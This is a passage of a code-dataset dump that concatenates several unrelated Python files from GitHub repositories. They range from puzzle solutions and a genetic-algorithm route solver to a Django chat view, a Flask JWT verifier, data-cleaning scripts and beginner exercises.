find_visible(grid,grid_rot):\n h = len(grid)\n w = len(grid[0])\n sol=0\n\n for y in range(1,(h-1)):\n \n for x in range(1,(w-1)):\n if grid[y][x] > max(grid[y][0:x]) or grid[y][x] > max(grid[y][x+1:len(grid[y])]):\n sol+= 1\n else:\n if grid_rot[x][y] > max(grid_rot[x][0:y]) or grid_rot[x][y] > max(grid_rot[x][y+1:len(grid_rot[x])]):\n sol+= 1\n return sol\n\ndef 
find_scenic_score(grid):\n h = len(grid)\n w = len(grid[0])\n\n scores=[]\n sol=0\n for y in range(1,(h-1)):\n for x in range(1,(w-1)):\n l=0\n r=0\n u=0\n d=0\n #Look left\n for i in range(x-1,-1,-1):\n if grid[y][i]>=grid[y][x]:\n l+=1\n break\n else:\n l+=1 \n\n #Look right\n for i in range(x+1,w):\n if grid[y][i]>=grid[y][x]:\n r+=1\n break\n else:\n r+=1 \n\n #Look up\n for i in range(y-1,-1,-1):\n if grid[i][x]>=grid[y][x]:\n u+=1\n break\n else:\n u+=1 \n\n #Look right\n for i in range(y+1,h):\n if grid[i][x]>=grid[y][x]:\n d+=1\n break\n else:\n d+=1 \n\n #Look down\n print(\"number: %d , x: %d, y: %d, l: %d, r: %d, u: %d, d: %d\"%(grid[y][x],x,y,l,r,u,d))\n\n scores.append(l*r*u*d)\n print(scores)\n return max(scores)\n\nif __name__ == \"__main__\":\n start_time = time.time()\n grid = read_input()\n grid_rot=list(zip(*grid))\n\n# Part one\n sol1=(len(grid)-1)*2+(len(grid[0])-1)*2 # calculate perimeter trees\n sol1+=find_visible(grid,grid_rot) # count visible trees inside perimeter\n\n# Part two\n sol2 = find_scenic_score(grid)\n \n print(\"Solution 1: %d trees\" % sol1)\n print(\"Solution 2: %d \" % sol2)\n print(\"Finished in %.5s seconds\" % (time.time() - start_time))","repo_name":"J0RENV/AOC2022","sub_path":"Challenge_8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9828373284","text":"import os\nimport pathlib\nimport shlex\nfrom typing import Any, Dict, List\n\nfrom craft_cli import CraftError, emit\nfrom craft_parts import LifecycleManager, PartsError, Step\nfrom xdg import BaseDirectory # type: ignore[import]\n\nfrom charmcraft import charm_builder, instrum\n\n\nclass PartsLifecycle:\n \"\"\"Create and manage the parts lifecycle.\n\n :param all_parts: A dictionary containing the parts defined in the project.\n :param work_dir: The working directory for parts processing.\n :param project_dir: The directory containing the charm project.\n :param ignore_local_sources: A list of local source patterns to be ignored.\n :param name: Charm name as defined in ``metadata.yaml``.\n \"\"\"\n\n def __init__(\n self,\n all_parts: Dict[str, Any],\n *,\n work_dir: pathlib.Path,\n project_dir: pathlib.Path,\n project_name: str,\n ignore_local_sources: List[str],\n ):\n self._all_parts = all_parts.copy()\n self._project_dir = project_dir\n\n # set the cache dir for parts package management\n cache_dir = BaseDirectory.save_cache_path(\"charmcraft\")\n\n try:\n self._lcm = LifecycleManager(\n {\"parts\": all_parts},\n application_name=\"charmcraft\",\n work_dir=work_dir,\n cache_dir=cache_dir,\n ignore_local_sources=ignore_local_sources,\n project_name=project_name,\n )\n except PartsError as err:\n raise CraftError(f\"Error bootstrapping lifecycle manager: {err}\") from err\n\n @property\n def prime_dir(self) -> pathlib.Path:\n \"\"\"Return the parts prime directory path.\"\"\"\n return self._lcm.project_info.prime_dir\n\n def run(self, target_step: Step) -> None:\n \"\"\"Run the parts lifecycle.\n\n :param target_step: The final step to execute.\n\n :raises CraftError: On error during lifecycle ops.\n :raises RuntimeError: On unexpected error.\n \"\"\"\n previous_dir = os.getcwd()\n try:\n os.chdir(self._project_dir)\n\n # invalidate build if packing a charm and entrypoint changed\n if \"charm\" in self._all_parts:\n charm_part = self._all_parts[\"charm\"]\n if charm_part.get(\"plugin\") == \"charm\":\n entrypoint = 
os.path.normpath(charm_part[\"charm-entrypoint\"])\n dis_entrypoint = os.path.normpath(_get_dispatch_entrypoint(self.prime_dir))\n if entrypoint != dis_entrypoint:\n self._lcm.clean(Step.BUILD, part_names=[\"charm\"])\n self._lcm.reload_state()\n\n emit.debug(f\"Executing parts lifecycle in {str(self._project_dir)!r}\")\n actions = self._lcm.plan(target_step)\n emit.debug(f\"Parts actions: {actions}\")\n with instrum.Timer(\"Running action executor\") as executor_timer:\n with self._lcm.action_executor() as aex:\n executor_timer.mark(\"Context enter\")\n for act in actions:\n emit.progress(f\"Running step {act.step.name} for part {act.part_name!r}\")\n with instrum.Timer(\"Running step\", step=act.step.name, part=act.part_name): # type: ignore[arg-type]\n with emit.open_stream(\"Execute action\") as stream:\n aex.execute([act], stdout=stream, stderr=stream)\n executor_timer.mark(\"Context exit\")\n\n except RuntimeError as err:\n raise RuntimeError(f\"Parts processing internal error: {err}\") from err\n except OSError as err:\n msg = err.strerror\n if err.filename:\n msg = f\"{err.filename}: {msg}\"\n raise CraftError(f\"Parts processing error: {msg}\") from err\n except Exception as err:\n raise CraftError(f\"Parts processing error: {err}\") from err\n finally:\n os.chdir(previous_dir)\n\n\ndef _get_dispatch_entrypoint(dirname: pathlib.Path) -> str:\n \"\"\"Read the entrypoint from the dispatch file.\"\"\"\n dispatch = dirname / charm_builder.DISPATCH_FILENAME\n entrypoint_str = \"\"\n try:\n with dispatch.open(\"rt\", encoding=\"utf8\") as fh:\n last_line = None\n for line in fh:\n if line.strip():\n last_line = line\n if last_line:\n entrypoint_str = shlex.split(last_line)[-1]\n except (OSError, UnicodeDecodeError):\n return \"\"\n\n return entrypoint_str\n","repo_name":"canonical/charmcraft","sub_path":"charmcraft/parts/lifecycle.py","file_name":"lifecycle.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"38"} +{"seq_id":"41001564562","text":"from flask import request\nfrom six.moves.urllib.request import urlopen\nfrom jose import jwt\nimport json\n\n\nclass AuthError(Exception):\n def __init__(self, error, status_code):\n self.error = error\n self.status_code = status_code\n\n\n# This code is borrowed from the python sample in module 7\n# Verify the JWT in the request's Authorization header\ndef verify_jwt(req: request, domain: str, client_id: str) -> dict:\n if \"Authorization\" in req.headers:\n auth_header = req.headers[\"Authorization\"].split()\n token = auth_header[1]\n else:\n raise AuthError(\n {\n \"code\": \"no auth.py header\",\n \"description\": \"Authorization header is missing\",\n },\n 401,\n )\n\n jsonurl = urlopen(f\"https://{domain}/.well-known/jwks.json\")\n jwks = json.loads(jsonurl.read())\n try:\n unverified_header = jwt.get_unverified_header(token)\n except jwt.JWTError:\n raise AuthError(\n {\n \"code\": \"invalid_header\",\n \"description\": \"Invalid header. \"\n \"Use an RS256 signed JWT Access Token\",\n },\n 401,\n )\n if unverified_header[\"alg\"] == \"HS256\":\n raise AuthError(\n {\n \"code\": \"invalid_header\",\n \"description\": \"Invalid header. 
\"\n \"Use an RS256 signed JWT Access Token\",\n },\n 401,\n )\n rsa_key = {}\n for key in jwks[\"keys\"]:\n if key[\"kid\"] == unverified_header[\"kid\"]:\n rsa_key = {\n \"kty\": key[\"kty\"],\n \"kid\": key[\"kid\"],\n \"use\": key[\"use\"],\n \"n\": key[\"n\"],\n \"e\": key[\"e\"],\n }\n if rsa_key:\n try:\n payload = jwt.decode(\n token,\n rsa_key,\n algorithms=[\"RS256\"],\n audience=client_id,\n issuer=f\"https://{domain}/\",\n )\n except jwt.ExpiredSignatureError:\n raise AuthError(\n {\"code\": \"token_expired\", \"description\": \"token is expired\"}, 401\n )\n except jwt.JWTClaimsError:\n raise AuthError(\n {\n \"code\": \"invalid_claims\",\n \"description\": \"incorrect claims,\"\n \" please check the audience and issuer\",\n },\n 401,\n )\n except Exception:\n raise AuthError(\n {\n \"code\": \"invalid_header\",\n \"description\": \"Unable to parse authentication\" \" token.\",\n },\n 401,\n )\n\n return payload\n else:\n raise AuthError(\n {\"code\": \"no_rsa_key\", \"description\": \"No RSA key in JWKS\"}, 401\n )\n","repo_name":"ljensen505/cloud-portfolio","sub_path":"helpers/verify_jwt.py","file_name":"verify_jwt.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72199414829","text":"import json\nfrom pathlib import Path\nfrom ast import literal_eval\nfrom json.decoder import JSONDecodeError\n\nfolder = Path.cwd().parent / 'dataset'\nfolder.mkdir(exist_ok=True)\nfiles = folder.glob(\"*.json\")\n\nbusiness = str(next(files))\ncheckin = str(next(files))\nreview = str(next(files))\ntip = str(next(files))\nuser = str(next(files))\n\nout_folder = Path.cwd().parent / 'dataset' / 'Clean Data'\nout_folder.mkdir(exist_ok=True)\nout_file_business = str(out_folder / 'yelp_output_business.json')\nout_file_checkin = str(out_folder / 'yelp_output_checkin.json')\nout_file_user = str(out_folder / 'yelp_output_user.json')\n\n\ndef fix_json_formatting(input_file: str, output_file: str):\n with open(input_file, 'r', encoding='utf-8') as f:\n # Read the input file as a string\n data_str = f.read()\n\n # Split the string into lines, if multiple objects are present\n data_lines = data_str.strip().split('\\n')\n\n # Parse each line as a separate JSON object\n for line in data_lines:\n try:\n data = json.loads(line)\n except JSONDecodeError:\n print(f\"Error decoding JSON object in line: {line}\")\n continue\n\n attributes = data.get('attributes')\n if attributes:\n for key, value in attributes.items():\n if isinstance(value, str) and value.startswith(\"u'\") and value.endswith(\"'\"):\n data['attributes'][key] = value[2:-1]\n # To evaluate and store the value as a JSON object, we use literal_eval\n elif isinstance(value, str) and value.startswith('{') and value.endswith('}'):\n data['attributes'][key] = literal_eval(value)\n elif isinstance(value, str) and value.startswith(\"'\") and value.endswith(\"'\"):\n data['attributes'][key] = value[1:-1]\n\n categories = data.get('categories')\n if categories:\n data['categories'] = data['categories'].replace(r\"\\/\", \", \")\n data['categories'] = categories.split(', ')\n\n # Write the cleaned JSON object to the output file\n with open(output_file, 'a') as c:\n json.dump(data, c)\n c.write('\\n')\n\n\ndef transform_list_len(input_file: str, output_file: str, item: str):\n with open(input_file, 'r', encoding='utf-8') as r:\n data_str = r.read()\n data_lines = data_str.strip().split('\\n')\n\n for line in data_lines:\n try:\n data = json.loads(line)\n 
except JSONDecodeError:\n print(f\"Error decoding JSON object in line: {line}\")\n continue\n\n dates_list = data[item].split(\", \")\n dates_len = len(dates_list)\n data[item] = dates_len\n\n with open(output_file, 'a') as w:\n json.dump(data, w)\n w.write('\\n')\n\n\nfix_json_formatting(business, out_file_business)\nprint('Transformation of Business well done!')\ntransform_list_len(checkin, out_file_checkin, \"date\")\nprint('Transformation of Checkin well done!')\ntransform_list_len(user, out_file_user, \"friends\")\nprint('Transformation of user well done!')\n\n","repo_name":"AdnenMess/yelp-document-streaming","sub_path":"Client/Transforming.py","file_name":"Transforming.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"13662933228","text":"from django.contrib import messages\nfrom accounts.models import User\nfrom chat.models import Chat\nfrom travellers.models import Traveller\nfrom places.models import Place\n\nfrom operator import itemgetter\nfrom PIL import Image\n\nfrom django.shortcuts import render,redirect\nfrom django.db.models import Q\nfrom django.contrib.auth.decorators import login_required\n\n@login_required\ndef chat(request, email):\n friend_user=User.objects.filter(email=email).first()\n friend_userid=friend_user.id #the one the peson is chatting with\n current_user=request.user #logged in user \n index=0\n user_name_chat=[] \n \n all_chat_list = Chat.objects.filter(Q(sender=current_user) | Q(receiver=current_user)) #every chat of the logged in user\n chat_list = Chat.objects.filter(Q(sender=current_user,receiver=friend_userid) | Q(receiver=current_user,sender=friend_userid)) #user specific chat list\n \n #save message to database\n if request.method == 'POST':\n hello = Chat(sender=request.user, receiver=User.objects.get(id=friend_userid), message_text=request.POST['message'])\n hello.save()\n \n for chat in all_chat_list:\n user = chat.receiver if chat.sender==current_user else chat.sender\n if any(user == x['user'] for x in user_name_chat): \n continue\n else:\n messages= all_chat_list.filter(Q(sender=user) | Q(receiver=user)).last()\n last_message_time=messages.message_time.isoformat()\n is_last_messagebycurrentuser= True if messages.sender==current_user else False\n photo=Traveller.objects.filter(email=user).first().photo_main \n \n user_name_chat.append({\n 'user':user, \n 'messages' : messages, \n 'last_message' : messages.message_text[:40],\n 'is_last_messagebycurrentuser' : is_last_messagebycurrentuser, \n 'user_photo' : photo, \n 'last_message_time' : last_message_time\n }) \n print(messages.message_time.isoformat())\n # print(index)\n # print(user_name_chat[0]['is_last_messagebycurrentuser'])\n # print(user_name_chat[index]['user'])\n # print(user_name_chat[index]['last_message'])\n # print(chat_list)\n \n index+=1\n # sort users in order of message time\n user_name_chat=sorted(user_name_chat, key=itemgetter('last_message_time'), reverse=True)\n \n context={ \n 'chat_details':user_name_chat,\n 'chat_friend':User.objects.get(id=friend_userid) ,\n 'chat_list':chat_list.order_by('message_time'),\n 'traveller_currentuser':Traveller.objects.filter(email=current_user.id).first(),\n 'traveller_chatuser':Traveller.objects.filter(email=friend_user.id).first(),\n 'logged_in_user': Traveller.objects.filter(email=current_user.id).first(),\n }\n \n # print(context['traveller_currentuser'].photo_main)\n print(context['chat_friend'])\n \n\n return render(request, 
\"chat/chat.html\", context)\n@login_required\ndef chatRedirect(request):\n last_message = Chat.objects.filter(Q(sender=request.user) | Q(receiver=request.user)).last()\n \n try:\n user = last_message.receiver if last_message.sender==request.user else last_message.sender\n print(user.email)\n return redirect(f\"{user.email}\")\n\n except:\n messages.info(request,'You haven\\'t talked with anyone yet.')\n print (request.META)\n return redirect(request.META['HTTP_REFERER'])\n\n\n\n\n# @login_required\n# def course_chat_room(request, course_id):\n# print(course_id)\n# return render(request, 'chat/room.html', {'course_id': course_id})\n ","repo_name":"sagarpaudell/travellum","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"16928485555","text":"import numpy as np\r\nimport random\r\nimport operator\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef create_new_member(n_city):\r\n pop = set(np.arange(n_city, dtype=int))\r\n route = list(random.sample(pop, n_city))\r\n\r\n return route\r\n\r\n# primeira geração\r\n\r\n\r\ndef create_starting_population(size, n_city):\r\n population = []\r\n\r\n for i in range(0, size):\r\n population.append(create_new_member(n_city))\r\n\r\n return population\r\n\r\n# distancia entre cidade i e cidade j\r\n\r\n\r\ndef distance(i, j):\r\n return np.sqrt((i[0]-j[0])**2 + (i[1]-j[1])**2)\r\n\r\n# fitness individual\r\n\r\n\r\ndef fitness(route, cities):\r\n score = 0\r\n for i in range(1, len(route)):\r\n k = int(route[i-1])\r\n l = int(route[i])\r\n\r\n score = score + distance(cities[k], cities[l])\r\n\r\n return score\r\n\r\n# fitness de toda população\r\n\r\n\r\ndef score_population(population, cities):\r\n scores = []\r\n\r\n for i in population:\r\n scores.append(fitness(i, cities))\r\n\r\n return scores\r\n\r\n\r\ndef crossover(a, b):\r\n child = []\r\n childA = []\r\n childB = []\r\n\r\n geneA = int(random.random() * len(a))\r\n geneB = int(random.random() * len(a))\r\n\r\n start_gene = min(geneA, geneB)\r\n end_gene = max(geneA, geneB)\r\n\r\n # seleciona randomicamente uma parte do primeiro progenitor\r\n for i in range(start_gene, end_gene):\r\n childA.append(a[i])\r\n\r\n # insere genes do segundo progenitor\r\n childB = [item for item in a if item not in childA]\r\n child = childA+childB\r\n\r\n return child\r\n\r\n\r\ndef breed_population(mating_pool):\r\n children = []\r\n for i in range(len(mating_pool)-1):\r\n children.append(crossover(mating_pool[i], mating_pool[i+1]))\r\n return children\r\n\r\n# duas cidades vão mudar de lugar\r\n\r\n\r\ndef mutate(route, probablity):\r\n route = np.array(route)\r\n for swaping_p in range(len(route)):\r\n if (random.random() < probablity):\r\n swapedWith = np.random.randint(0, len(route))\r\n temp1 = route[swaping_p]\r\n temp2 = route[swapedWith]\r\n route[swapedWith] = temp1\r\n route[swaping_p] = temp2\r\n\r\n return route\r\n\r\n\r\ndef selection(popRanked, eliteSize):\r\n selectionResults = []\r\n\r\n # roulette wheel\r\n df = pd.DataFrame(np.array(popRanked), columns=[\"Index\", \"Fitness\"])\r\n df['cum_sum'] = df.Fitness.cumsum()\r\n df['cum_perc'] = 100*df.cum_sum/df.Fitness.sum()\r\n\r\n for i in range(0, eliteSize):\r\n selectionResults.append(popRanked[i][0])\r\n\r\n for i in range(0, len(popRanked) - eliteSize):\r\n pick = 100*random.random()\r\n for i in range(0, len(popRanked)):\r\n if pick <= df.iat[i, 3]:\r\n 
selectionResults.append(popRanked[i][0])\r\n break\r\n\r\n return selectionResults\r\n\r\n\r\ndef get_all_fitness(population, cities_list):\r\n fitnessResults = {}\r\n for i in range(0, len(population)):\r\n fitnessResults[i] = fitness(population[i], cities_list)\r\n return sorted(fitnessResults.items(), key=operator.itemgetter(1), reverse=False)\r\n\r\n# mutation function for the whole population\r\ndef mutate_population(children, mutation_rate):\r\n new_generation = []\r\n for i in children:\r\n mutated_child = mutate(i, mutation_rate)\r\n new_generation.append(mutated_child)\r\n return new_generation\r\n\r\n\r\ndef mating(population, selectionResults):\r\n mating_pool = []\r\n for i in range(0, len(selectionResults)):\r\n index = selectionResults[i]\r\n mating_pool.append(population[index])\r\n return mating_pool\r\n\r\n\r\ndef next_generation(cities_list, current_population, mutation_rate, elite_size):\r\n # rank the routes of the next generation\r\n population_rank = get_all_fitness(current_population, cities_list)\r\n\r\n # determine the potential parents\r\n selection_result = selection(population_rank, elite_size)\r\n\r\n mating_pool = mating(current_population, selection_result)\r\n\r\n # breed the new generation\r\n children = breed_population(mating_pool)\r\n\r\n # apply mutation to it\r\n next_generation = mutate_population(children, mutation_rate)\r\n\r\n return next_generation\r\n\r\n\r\ndef a_romaria_da_vovo(cities_list, size_population=100, elite_size=20, mutation_rate=0.01, generation=500):\r\n pop = create_starting_population(size_population, len(cities_list))\r\n\r\n print("First route distance found: " +\r\n str(get_all_fitness(pop, cities_list)[0][1]))\r\n\r\n for i in range(0, generation):\r\n pop = next_generation(cities_list, pop, mutation_rate, elite_size)\r\n print("New route distance: " +\r\n str(get_all_fitness(pop, cities_list)[0][1]))\r\n\r\n print("Final and best route distance found: " +\r\n str(get_all_fitness(pop, cities_list)[0][1]))\r\n\r\n\r\ncities = []\r\n\r\nwith open('data.txt') as f:\r\n f.readline().strip()\r\n for line in f:\r\n line = line.strip()\r\n line = line.split()\r\n line.pop(2)\r\n cities.append((float(line[0]),\r\n float(line[1])))\r\n\r\na_romaria_da_vovo(cities_list=cities)\r\n","repo_name":"marielacordeiro/genetic_algorithm","sub_path":"a_romaria.py","file_name":"a_romaria.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"36341134337","text":"import re\nfrom Text import TextFile\n\nconfig = {\n 'base': "http://www.allmusic.com",\n 'search': "/search/artists/%s",\n 'search_space_char': '-',\n 'artistlink': '(/artist/[^"]*)"[^>]*>%s( \[.*?\])?',\n 'link': '(/album/[^"]*)" class="title[^>]*>%s( \[.*?\])?'\n}\n\n\ndef matches(text):\n return 'allmusic' in text or 'AllMusic' in text\n\n\nclass AllmusicFile(TextFile):\n\n def __init__(self, text):\n self.log("init")\n tmptext = ""\n\n tmptext = self.rating(text, tmptext)\n tmptext = self.review(text, tmptext)\n tmptext = self.genres(text, tmptext)\n tmptext = self.moods(text, tmptext)\n tmptext = self.tracks(text, tmptext)\n\n #v1\n tmptext = re.sub('', '', tmptext)\n tmptext = re.sub('"AMG', '* ', tmptext)\n tmptext = re.sub('', ' ', tmptext)\n\n tmptext = re.sub('width="582"', '', tmptext)\n tmptext = re.sub('padding-bottom:5px', '', tmptext) # listings\n tmptext = re.sub('padding-bottom:4px', 'padding:3px', tmptext) # review text\n tmptext = 
re.sub('', '', tmptext)\n tmptext = re.sub('', '', tmptext)\n tmptext = re.sub('', ' ', tmptext)\n\n self.text = '' + tmptext + ''\n\n self.css += """\n \n \n \n """\n\n def rating(self, text, tmptext):\n s = re.search('("([0-9\.]*)', text, re.S)\n if s:\n tmptext += 'Rating'\n tmptext += s.group(2) + ''\n else:\n #v2\n # e.g. "star_rating(7)"\n s = re.search('', text, re.S)\n if s:\n tmptext += 'Rating'\n tmptext += s.group(1) + '/10'\n else:\n #v3\n s = re.search('itemprop="rating">(.*?)', text, re.S)\n if s:\n tmptext += 'rating'\n tmptext += s.group(1) + '/5'\n return tmptext\n\n def review(self, text, tmptext):\n s = re.search('(.*?)', text, re.S) # text\n if s:\n tmptext += s.group(1) + ''\n else:\n #v2\n s = re.search('(.*?)', text, re.S) # text\n if s:\n s2 = re.search('(.*?)', text, re.S) # author\n if s2:\n tmptext += s2.group(1) + ''\n tmptext += s.group(1) + ''\n else:\n #v3\n s = re.search('(.*?)'\n return tmptext\n\n def genres(self, text, tmptext):\n s = re.search('(.*?)', text, re.S)\n if s:\n # tmptext += 'Genre & Styles'\n tmptext += s.group(1)\n else:\n #v3\n s = re.search('(genre.*?)', text, re.S)\n if s:\n tmptext += s.group(1)\n return tmptext\n\n def moods(self, text, tmptext):\n s = re.search('Moods( Listing|/Themes)-->(.*?)', text, re.S)\n if s:\n # tmptext += 'Moods & Themes'\n tmptext += s.group(2)\n else:\n #v3\n s = re.search('(album moods.*?)(.*?)', text, re.S)\n if s:\n tmptext += s.group(1)\n else:\n #v3\n s = re.search('(.*?)
', '', tmptext)\n tmptext = re.sub('', '', tmptext)\n # tmptext = re.sub('width=\"235px\"', '', tmptext)\n # tmptext = re.sub('width=\"237px\"', '', tmptext)\n # tmptext = re.sub('width=\"552px\"', '', tmptext)\n return tmptext\n","repo_name":"camico/AmarokReader","sub_path":"conTEXT/filetypes/Allmusic.py","file_name":"Allmusic.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28790024420","text":"'''\n Date : 11/11/2020\n Day : Wednessday\n Author : Md. Aminul Islam\n Topic : Problem Solving\n Problem : Sum and Prod\n Problem link : https://www.hackerrank.com/challenges/np-sum-and-prod/problem\n''' \n\nimport numpy as np\n\nn, m = map(int, input().split())\n\narr = np.array([input().split() for _ in range(n)], int)\n\narr_sum = np.sum(arr, axis = 0)\narr_prod = np.prod(arr_sum)\n\nprint(arr_prod)","repo_name":"aminul788/NSL-RAShip-Programm","sub_path":"python-basic/Problem-Solving/Sum_and_Prod.py","file_name":"Sum_and_Prod.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9262663437","text":"import os\nimport numpy as np\nimport pandas as pd\nimport constant\n\nRANDOM_SEED = [12346, 12347, 12348]\nASR = constant.ASR\nTTS = constant.TTS\nDATASET = constant.DATASET\n\nimport sys, getopt\nimport utils\nimport constant\n\ndef printHelp() :\n print('calculate_averaged_result.py -a ')\n print(\"or\")\n print('calculate_averaged_result.py --approach ')\n\ndef main(argv):\n approach = \"\"\n try:\n opts, args = getopt.getopt(argv,\"ha:\",[\"approach=\"])\n except getopt.GetoptError:\n printHelp()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n printHelp()\n sys.exit()\n elif opt in (\"-a\", \"--approach\"):\n approach = arg\n \n if approach != \"\" :\n calculateAveragedResult(approach)\n else :\n print(\"Please specify the output file location\")\n\ndef calculateAveragedResult(approach) :\n\n df = {}\n avg = {}\n\n for tts in TTS:\n\n a = {}\n avg[tts] = {}\n\n for sr in ASR:\n\n b = {}\n\n avg[tts][sr] = {}\n\n for random_seed in RANDOM_SEED:\n\n fpath = \"result/%s/%s-%d/%s/%s/statistic.csv\" % (approach,\n DATASET, random_seed, tts, sr)\n b[random_seed] = pd.read_csv(fpath)\n\n a[sr] = b\n\n df[tts] = a\n\n avg = {}\n for tts in TTS:\n t = {}\n for sr in ASR:\n s = {}\n i = RANDOM_SEED[0]\n first = i\n temp = df[tts][sr][i]\n for i in RANDOM_SEED:\n if i != first:\n temp = temp.add(df[tts][sr][i], fill_value=0)\n t[sr] = temp/len(RANDOM_SEED)\n t[sr] = t[sr].drop(columns=[\"stc\", \"utc\"])\n avg[tts] = t\n\n for tts in TTS:\n for sr in ASR:\n folder = \"result/%s/%s-averaged/%s/%s/\" % (approach, DATASET,tts, sr)\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n fpath = folder + \"statistic.csv\"\n avg[tts][sr].to_csv(fpath, index=False, float_format='%.2f')\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"soarsmu/CrossASR","sub_path":"calculate_averaged_result.py","file_name":"calculate_averaged_result.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"6204776345","text":"# https://leetcode.com/problems/remove-duplicates-from-sorted-array/\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n insert_at = 1\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n nums[insert_at] = nums[i]\n 
insert_at += 1\n\n return insert_at\n","repo_name":"priyakdey/leetcode-solutions","sub_path":"arrays/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33404068595","text":"# Добавить в Employee атрибут класса department = None\n# Унаследовать от Employee класс TechnicalStaff в котором реализовать метод класса change_department, позволяющий\n# менять департамент\n# Добавить в свойство info данные о департаменте\n\n# Добавить в TechnicalStaff статичный метод get_info(employee), получающий данные от работника и если работник из того же\n# департамента - выдавать приветствие.\n\nfrom hw_08_01 import Employee\n\n\nclass TechnicalStaff(Employee):\n department = 'Practical medicine'\n\n @staticmethod\n def get_info(employee):\n if TechnicalStaff.department == employee.department:\n return 'hi'\n return 'You are from different department'\n\n\nfirst_employee = Employee('Yulia', 'Sukach', 24, 'someone')\nassert first_employee.info['fullname'] == 'Yulia Sukach'\nassert first_employee.info['age'] == 24\n\n\nfirst_employee.change_department('Preventive medicine')\n\n\nsecond_employee = TechnicalStaff('Alesia', 'Ivanova', 25, 'dentist')\nassert second_employee.info['fullname'] == 'Alesia Ivanova'\nassert second_employee.info['age'] == 25\n\nassert TechnicalStaff.get_info(first_employee) == 'You are from different department'\n\nsecond_employee.change_department('Preventive medicine')\n\nassert TechnicalStaff.get_info(first_employee) == 'hi'\n\n\n\n\n","repo_name":"YuliaSukach/Python-HW","sub_path":"less_08/hw_08_02_03.py","file_name":"hw_08_02_03.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5333006684","text":"def ispangram(str): \r\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\r\n for char in alphabet: \r\n if char not in str.lower(): \r\n return False\r\n \r\n return True\r\n\r\nstr = input(\"enter a sentence :\\n \")\r\nif ispangram(str):\r\n print('contains all alphabets')\r\nelse:\r\n print('does not contain all alphabets')\r\n","repo_name":"aryanjalla/advanceProgrammingPractices","sub_path":"Week 2/SET 14/ques1.py","file_name":"ques1.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31251027477","text":"\r\nprint(\"hrllo world\")\r\n\r\nfor i,count in enumerate(range(500)):\r\n print(i, count,end = \"\\n============\\n\", sep = \"-\")\r\n \r\n# ================================================================\r\n \r\ntest = print(int((input(\"enter\")))*2)\r\n\r\n# ================================================================\r\n# positive even, positive odd, negative even, negative odd, zero\r\n\r\nx = float(input(\"enter no: \"))\r\n\r\nprint()\r\n\r\nif(x>0):\r\n if(x % 2 ==0):\r\n print(x,\"is positive even\")\r\n else:\r\n print(x,\"is positive odd\")\r\nelif(x<0):\r\n if(x % 2 ==0):\r\n print(x,\"is negative even\")\r\n else:\r\n print(x,\"is negative odd\")\r\nelse:\r\n print(x,\"is zero\")\r\nprint()\r\n\r\n\r\n\r\nif(x > 0) and (x % 2 == 0):\r\n print(x,\"is positive even\")\r\n\r\nelif(x > 0) and (x % 2 == 1):\r\n print(x,\"is positive odd\")\r\n\r\nelif(x < 0) and (x % 2 == 0):\r\n print(x,\"is negative even\")\r\n\r\nelif(x < 0) and (x % 2 == 1):\r\n print(x,\"is negative odd\")\r\n\r\nelse:\r\n print(x,\"is zero\")\r\n# 
================================================================\r\n\r\n\r\nprint(\"camparision program\")\r\n\r\na = float(input(\"enter a: \"))\r\nb = float(input(\"enter b: \"))\r\n\r\nif(a > b):\r\n print(a,\"is greater than\",b)\r\nelif(a < b):\r\n print(b,\"is greater than\",b)\r\nelse:\r\n print(f\"{a} amd {b} are the same\")\r\n\r\n\r\na = int(input(\"enter your current salary: \"))\r\nk = int(input(\"enter increment per month: \"))\r\ny = int(input(\"years: \"))\r\n# your salary will be b after 5 yrs\r\n\r\nt = y * 12 # t is duration in months\r\nb = a + k*t\r\n\r\nprint(f\"your salary will be {b} rs after {y} years\")\r\n\r\n# sum of n natural numbers\r\n\r\nn = int(input(\"till which number you want sum ? \"))\r\n\r\n# using for loop\r\nsum=0\r\nfor i in range(1,n+1):\r\n sum += i\r\n\r\n# using formula\r\nsum = n*(n+1)/2\r\n\r\nprint(sum)\r\n\r\n# table of n\r\n\r\nn = int(input(\"you want table of ? \"))\r\n\r\nfor i in range(1,11):\r\n print(i*n,end = \" \")\r\n \r\nr = range(6)\r\nprint(r)\r\nprint(type(r))\r\nprint(list(r))\r\n\r\nprint(list(range(20,10,-2)))\r\nprint(list(range(20,10,2)))\r\n\r\n# smallest 